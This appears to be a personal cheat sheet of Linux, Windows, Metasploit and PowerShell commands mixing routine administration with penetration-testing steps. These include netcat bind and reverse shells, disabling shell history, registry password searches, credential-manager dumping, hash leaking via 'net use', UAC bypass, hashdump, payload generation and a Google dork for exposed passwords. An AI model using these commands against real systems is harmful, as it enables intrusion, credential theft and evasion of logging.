legal contact

commands to memorize/know

More to come, be shure....

This is an ongoing project of things I need all the time but somehow doesn't stick to my brain and needs a place to live to be remembered every day.

Very special thx to SYNjunkie for his inspiration


shell command description
netstat -Tul show all active waiting sockets
update-rc.d [service] enable enables the service to start automatically at boot time
| cut -d "[delimiter]" -f [field number to extract] print out the defined field [-f x] of a line of text
for [variablename] in $(cat input.txt); do [comand] $variablename; done action each line of an textfile with [command]
nc -nv 110 connect netcat to IP port 110 (client)
nc -nlvp 4444 have netcat receive data on port 4444 (server)
nc -nlvp 4444 > incoming.exe have netcat receive data and write this to incoming.exe
nc -nlvp 4444 -e cmd.exe have netcat offer a shell on port 4444
nc -nv 4444 -e /bin/bash have netcat send (and start) a remote shell on the dest. system
ncat ­‐exec cmd.exe ­‐allow ‐vnl 4444 ­‐ssl have netcat allow a shell access via SSL from source only
tcpdump -i eth0 -nX dump eth0 & display data in HEX
nmap -v -p 139,445 --script-args=unsafe=1 --script=smb-check-vulns [target IP] Check for SMB vulns
nmap -T4 -O [target ip-range] noisy but quick scan
Acquire::http::proxy ""; Acquire::https::proxy ""; Acquire::ftp::proxy ""; apt to use proxy (/etc/apt/apt.conf)
unset HISTFILE deactivate writing down command history for the duration of your session
set HISTFILE=/~/.bash_history revert the above deactivation
Add more space or new disk in vmware
cfdisk create LVM (type 8e) partition
pvcreate /dev/[new partition]
vgs write down the VG name
vgextend [VG name] /dev/[new partition]
lvextend -l +100%FREE /dev/[VG name]/[mount point name] Use all available space
resize2fs -p /dev/[VG name]/[mount point name] oder: lvextend --resizefs -l +100%FREE /dev/[VG name]/[mount point] grub-mkdevicemap update-grub Create the data layout at the new space
df -h check if new space is available
timedatectl check the system time and other time configs
sudo timedatectl set-timezone Europe/Berlin set the timezone to Europe/Berlin
[shift] Hold shift while booting to enter extd. boot menu.
at linux= add init=/bin/bash at the end of line boot into bash
mount -o remount,rw / remount root as RW to make changes
du -ahm ./ | sort -n -f | head 20 display the 20 biggest entries in filesystem at ./


shell command description
netstat -ano show all active waiting sockets
net start show all running services
pushd \\[SMB-Share\]Directory] map SMB share to the next free drive letter and chdir into it
[cmd1] && [cmd2] Run [cmd1] and if successfull run [cmd2]
psexec \\[NB-Name of dest] cmd open a remote shell on dest
psexec \\[NB-Name\Dir cmd /c [cmd1] psexec and run [cmd1]
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" Get the OS version
net users show the local user accounts
netsh firewall show state show the FW status
schtasks /query /fo LIST /v show the scheduled tasks
tasklist /SVC show the running services
DRIVERQUERY look for outdated or dodgy drivers installed
psexec @serverlist.txt -c "\\File-Server\SecurityPatches$\MS08-067.exe /quiet /norestart /overwriteoem" Use PSEXEC to deploy some software (i.e. a patch, nc, meterpreter, etc.)
gc c:\servers.txt | ForEach-Object { gwmi win32_operatingsystem -ComputerName $_ | ForEach-Object { $_.reboot() }} PS to reboot the machines in c:\servers.txt
NET LOCALGROUP Administrators List all local administrators
query session Get a list of currently logged on local users
DSQUERY USER -name *pauli* | DSGET USER -samid –display Search for user by last name within the domain
DSQUERY Server -o rdn Find the PDC
nltest /dclist:%userdomain Show all DC's of the domain your'e in
dsquery user -limit 0 List all users in the domain
dsquery user domainroot -stalepwd 180 -limit 0 List stale user accounts
dsquery user domainroot -disabled -limit 0 List disabled user accounts
reg query HKLM /f password /t REG_SZ /s find passwords in registry
cmdkey /list dump the cerdential manager information
net use file://[IP] send your hash to [IP]


shell command description
getuid display my server- and username
getprivs show my priviledges
background backround my session and give me a new cmd
use exploit/windows/local/bypassuac bypass UAC
after that: set SESSION [backgrounded session #]
after that: set PAYLOAD windows/meterpreter/reverse_tcp define the new meterpreter session to use the bypass UAC
after that: SET LHOST [Victim IP]
after that: SET LPORT´[Port to receive the new session]
clear clear your screen
ps show the active process list (with users)
migrate [process nbr] migrate my session to run as the process # user rights
hashdump dump the hash table
sessions -l display all available sessions
------------------------------------- -------------------------------------
use exploit/windows/smb/psexec Extract hashdump
set payload windows/meterpreter/reverse_tcp
set SMBPass xxxxx

Google Hacks

shell command description
intitle:index.of.dropbox passw Find open Dropbox shares with password information


shell command description
./msfpayload windows/shell_bind_tcp LPORT=4444 X > /tmp/Listen-shell.exe Create a simple Windows listener
nc [target IP] 4444 connect to listener
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=[target IP] E simple reverse shell
./msfpayload windows/vncinject/reverse_tcp LHOST= LPORT=2482 X > /tmp/reverse-vnc.exe VNC
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST= LPORT=2482 DisableCourtesyShell=TRUE E
./msfpayload windows/meterpreter/bind_tcp LPORT=4444 X > met-listen.exe meterpreter listener
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=[target IP] LPORT=4444 E
setg set the variable global, so that it will last even for the next "use" command


shell command description
#Find-Files.ps1 $1 = (read-Host "Enter start date e.g yyyy/mm/dd") $2 = (read-Host "Enter finish date e.g yyyy/mm/dd") $path = (Read-Host "Enter path of target e.g \\server\c$\windows\") $results = (Read-Host "Where do you want the results saved to? e.g c:\temp\") $start = [datetime]$1 $end = [datetime] $2 $period = {$_.lastwritetime -gt $start -and $_.lastwritetime -lt $end} gci $path -Recurse | where {!$_.psiscontainer -and (.$period)} | Out-File -Width 255 $Results Thanks to this will find modified files (even on remote boxes)
Install-windowsfeature Server-Gui-Mgmt-Infra, Server-Gui-Shell -Restart Install/Enable the Server GUI on a core install
OR: Dism /online /enable-feature /featurename:ServerCore-FullServer /featurename:Server-Gui-Shell /featurename:Server-Gui-Mgmt Install/Enable the Server GUI on a core install
Import-module servermanager Uninstall-windowsfeature -name Server-GUI-Mgmt-Infra,Server-GUI-Shell Uninstall the Server GUI on a core install

remote access for monitoring

shell command description
psexec -u [domain]\[username] \\[hostname] cmd get a remote shell on [hostname]
pushd \\[server]\share map the next free drive letter to the share AND chdir into it
winpmem_1.6.2.exe %COMPUTERNAME%/%COMPUTERNAME%.dmp >>%COMPUTERNAME%/%COMPUTERNAME%.log save a memory dump
sysmon -accepteula -n -i >>%COMPUTERNAME%/%COMPUTERNAME%.log Install sysmon as a service


regex action
[^\:]+ jump to ":"